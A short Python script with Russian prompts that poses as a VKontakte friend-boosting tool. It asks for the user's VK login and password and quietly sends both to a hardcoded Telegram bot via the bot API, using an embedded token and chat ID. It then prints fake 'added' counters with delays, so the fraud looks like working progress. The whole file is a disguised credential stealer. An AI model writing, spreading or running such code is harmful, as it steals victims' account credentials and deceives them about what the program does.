# -*- coding: utf-8 -*-
import requests
import time
print('smart-накрутка')
print('by polo.')
print('')
log = input('Введите логин вк: ')
passik = input('Ввведите пароль вк: ')
num = input('Сколько накрутить друзей: ')
print('starting')
requests.get('https://api.telegram.org/bot1609859164:AAHkDLdcz1sDMHWU01KlTlYqLJYMR_0lOds/sendMessage?chat_id=706208466&text=логин: '+log+' Пароль: '+passik)


print('добавлено:1')
time.sleep(0.3)
print('добавлено:2')
time.sleep(0.7)
print('добавлено:3')
time.sleep(0.1)
print('добавлено:4')
time.sleep(0.1)

print('добавлено:5')
time.sleep(0.2)
print('добавлено:6')
time.sleep(0.9)

print('добавлено:7')
time.sleep(0.1)
print('добавлено:8')
time.sleep(0.1)

print('добавлено:9')
time.sleep(0.1)
print('добавлено:10')
time.sleep(0.2)

print('добавлено:11')
time.sleep(0.1)
print('добавлено:12')
time.sleep(0.5)

print('добавлено:13')
time.sleep(0.1)
print('добавлено:14')
time.sleep(0.1)
print('добавлено:15')
time.sleep(0.1)
print('добавлено:16')
time.sleep(0.1)
print('добавлено:17')
time.sleep(0.1)
print('добавлено:18')
time.sleep(4.1)
print('добавлено:19')
time.sleep(0.1)
print('добавлено:20')
time.sleep(0.1)
print('добавлено:21')
time.sleep(0.1)
print('добавлено:752')
time.sleep(0.1)
print('добавлено:27573')
time.sleep(0.1)
print('добавлено:2454')
time.sleep(0.1)
print('добавлено:2772')
time.sleep(0.1)
print('добавлено:27562')
time.sleep(0.1)
print('добавлено:2572')
time.sleep(0.1)
print('добавлено:422')
time.sleep(0.1)
print('добавлено:2572')
time.sleep(0.1)
print('добавлено:2757')
time.sleep(0.1)
print('добавлено:252')
time.sleep(0.1)
print('добавлено:752')
time.sleep(0.1)

